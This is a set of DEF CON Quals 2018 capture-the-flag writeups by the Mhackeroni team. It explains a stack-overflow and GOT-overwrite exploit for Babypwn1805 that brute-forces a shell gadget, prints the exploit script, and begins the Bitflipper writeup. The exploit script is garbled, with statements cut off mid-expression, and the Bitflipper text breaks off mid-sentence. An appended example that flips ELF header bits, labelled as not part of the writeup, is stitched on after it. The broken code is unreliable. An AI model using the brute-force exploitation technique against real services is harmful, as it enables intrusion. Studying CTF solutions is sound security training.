DEFCON CTF QUALS 2018 - Write ups

This is the collection of writeups for the DEF CON Quals 2018 by the Mhackeroni team.

Index

Adamtune - Babypwn1805 - Bitflipper - Ddtek: Preview - Easy Pisy - Elastic Cloud Compute - ELF Crumble - Exzendtential-crisis - Flagsifier - Geckome - Ghettohackers: Throwback - It's-a me! - Note Oriented Programming - Official - PHP Eval White-List - Ps-secure - Race Wars - Sbva - Shellql - TechSupport - WWW - You Already Know

Adamtune

Hey folks! We really wanted to write up this challenge for you – but we decided to let Adam Doupé personally explain it instead.

Babypwn1805

Reading the provided C source file we found the two stack-based 1024-byte buffer overflows and the "write 8 bytes at a position relative to the bss asdf variable" possibility with the second read.

At first we tried using the stack buffer overflow to overwrite the last byte of the pointer to the name string of the program. By leaking the environment we discovered that there was a preloaded custom libc, probably different each time.

The second step was going backwards in the bss writing only 1 byte, trying to find where the GOT entry for read is. Overwriting the LSB, we manage to call different functions when the offset is -56 from the variable in bss.

Then we set up a bruteforce of the last two bytes of the read GOT entry, trying to hit a one_gadget (a single address that calls execv("/bin/sh/")). We found that a few addresses returned an error related to /bin/sh having the wrong parameters, so we did another bruteforce, this time trying to jump a few bytes before or after the addresses that returned a good output. We managed to execute the echo command provided, so we refined the payload to cat the flag.

Exploit (final iteration)

    from __future__ import print_function
    import sys
    import struct
    import hashlib
    from pwn import *
    from random import randint
    import signal
    import sys

    host = ''
    port = 31337

    def signal_handler(signal, frame):
        print('You pressed Ctrl+C!')
        sys.exit(0)

    signal.signal(signal.SIGINT, signal_handler)
    print('Press Ctrl+C')

    def pow_hash(challenge, solution):
        return hashlib.

        conn.sendline('...'.format(solution, pow_hash(challenge, solution)))
        conn.recvuntil("Go\n")

    if __name__ == '__main__':
        while True:
            while True:
                try:
                    connect()
                    break
                except:
                    continue
            while True:
                try:
                    # currentMagic = random.choice(magics) + randPart
                    currentMagic = random.
                    conn.recvuntil("Go\n")
                    # if (len(resp)=0):
                    conn.send(p16(currentMagic))
                    # nd(p64(0x7ffff7af1cde))
                    log.info("Current " + hex(currentMagic))
                    sleep(0.1)
                    resp = conn.
                    resp = resp.replace("Go\n", "")
                    if (len(resp) > 0):
                        log.warning("Executed stuff " + hex(currentMagic) + " : " + repr(resp))
                except EOFError:
                    log.

Bitflipper

We are given access to a server that runs a packed ELF x86-64 program.

"I would send you a core dump, but I could not find any in the current directory"

Cool! This means that if we manage to flip some bits in the ELF header to make it become an ELF core file, the server will send us the entire binary! Indeed, flipping bits 128, 129 and 130, changing the byte at offset 0x10 from 0x03 to 0x04, works just fine! Now we have a binary we can disassemble and begin to work on.

By computing the MD5 hash of the file we just got from the server we can verify that it is indeed the same binary which is run by the wrapper server-side. Moreover, we can now try out various combinations of bit flips and compare the new local MD5 with the remote MD5 to check whether we flipped the bits correctly. The binary
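To make the Bitflipper header trick concrete, here is an added example (not code from the Mhackeroni writeup) that works on a constructed, minimal 64-byte ELF64 header rather than the challenge binary. It reads the 16-bit little-endian e_type field at offset 0x10, computes which global bit indices must change to turn ET_DYN (3) into ET_CORE (4), applies those flips, and checks the result against an expected MD5 the way the writeup compares the local file with the remote hash. The header contents, the helper names and the "remote" MD5 are all assumptions made for this example.

```python
import hashlib
import struct

ELF_MAGIC = b"\x7fELF"
E_TYPE_OFFSET = 0x10      # e_type is a 16-bit LE field at byte 16 of the ELF header
ET_DYN, ET_CORE = 3, 4    # shared object / PIE executable, core file


def make_elf_header(e_type):
    """Constructed 64-byte ELF64 header used as sample input (not a real binary)."""
    hdr = bytearray(64)
    hdr[0:4] = ELF_MAGIC
    hdr[4] = 2                                   # ELFCLASS64
    hdr[5] = 1                                   # ELFDATA2LSB
    hdr[6] = 1                                   # EV_CURRENT
    struct.pack_into("<H", hdr, E_TYPE_OFFSET, e_type)
    struct.pack_into("<H", hdr, 0x12, 62)        # e_machine = EM_X86_64
    return bytes(hdr)


def e_type(data):
    """Return the e_type of an ELF image, refusing anything without the magic."""
    if data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF image")
    return struct.unpack_from("<H", data, E_TYPE_OFFSET)[0]


def bits_to_flip(data, new_type):
    """Global bit indices (bit 0 = LSB of byte 0) that differ between the
    current e_type and new_type. Only the 16 bits of the field are considered."""
    diff = e_type(data) ^ new_type
    return [E_TYPE_OFFSET * 8 + k for k in range(16) if (diff >> k) & 1]


def flip_bits(data, bits):
    """Toggle the given global bit indices and return the modified copy."""
    buf = bytearray(data)
    for bit in bits:
        buf[bit // 8] ^= 1 << (bit % 8)
    return bytes(buf)


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def matches_remote(local_data, remote_md5):
    """The writeup's check: does the locally patched file hash to the remote MD5?"""
    return md5_hex(local_data) == remote_md5


def demo():
    original = make_elf_header(ET_DYN)
    # Hypothetical remote hash: what the server-side file would hash to after the flip.
    remote_md5 = md5_hex(make_elf_header(ET_CORE))
    bits = bits_to_flip(original, ET_CORE)       # [128, 129, 130], as in the writeup
    patched = flip_bits(original, bits)
    return bits, e_type(original), e_type(patched), matches_remote(patched, remote_md5)


if __name__ == "__main__":
    bits, before, after, ok = demo()
    print("flip bits", bits, "e_type", hex(before), "->", hex(after), "md5 match:", ok)
```

Byte 0x10 goes from 0x03 to 0x04, so the three differing bits are bits 0, 1 and 2 of that byte, i.e. global bits 128, 129 and 130; any other candidate flip can be verified the same way by comparing the local MD5 with the one reported by the remote wrapper.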